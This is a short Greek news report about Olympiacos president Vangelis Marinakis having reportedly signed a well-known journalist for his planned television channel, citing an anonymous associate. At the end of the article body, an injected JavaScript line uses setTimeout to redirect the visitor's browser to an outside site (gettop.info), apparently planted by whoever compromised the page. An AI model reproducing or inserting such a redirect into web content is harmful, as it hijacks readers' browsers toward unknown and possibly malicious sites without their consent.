Μεγάλο όνομα έχει κλείσει ο Βαγγέλης Μαρινάκης για τον σταθμό του

0
89

Μεγάλο όνομα του δημοσιογραφικού και τηλεοπτικού χώρου έχει κλείσει ο Βαγγέλης Μαρινάκης για το υπό δημιουργία κανάλι του. Όπως λέγεται, η συμφωνία έχει επιτευχθεί αμέσως μετά τη λήξη του διαγωνισμού για τις τηλεοπτικές άδειες, αλλά και οι δυο πλευρές αποφάσισαν να μην ανακοινώσουν τίποτα μέχρις ότου έρθει το «πλήρωμα του χρόνου«.

Ο πρόεδρος του Ολυμπιακού ελπίζει ότι ο σταθμός του θα καταφέρει να γίνει σημείο αναφοράς, όπως ήταν για πολλά χρόνια το Mega, και βασίζει πολλά πάνω στο πρόσωπο αυτό, το οποίο ήθελε οπωσδήποτε να περιλάβει στο νέο του εγχείρημα. «Από εκεί ξεκινούσε ο σχεδιασμός του, ήταν το Α στο τηλεοπτικό του αλφαβητάρι», λέει άνθρωπος που συνομιλεί  τακτικά μαζί του.

Πότε θα γίνουν ανακοινώσεις; «Δεν υπάρχει λόγος βιασύνης», προσθέτει ο ίδιος. «Άλλωστε, ούτε το όνομα του διευθυντή ειδήσεων και ενημέρωσης Δημήτρη Μιχαλέλη έχει ανακοινωθεί ακόμη επισήμως. Και, όμως, έχει οριστεί και ήδη προχωρά στη στελέχωση του ενημερωτικού τομέα».  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here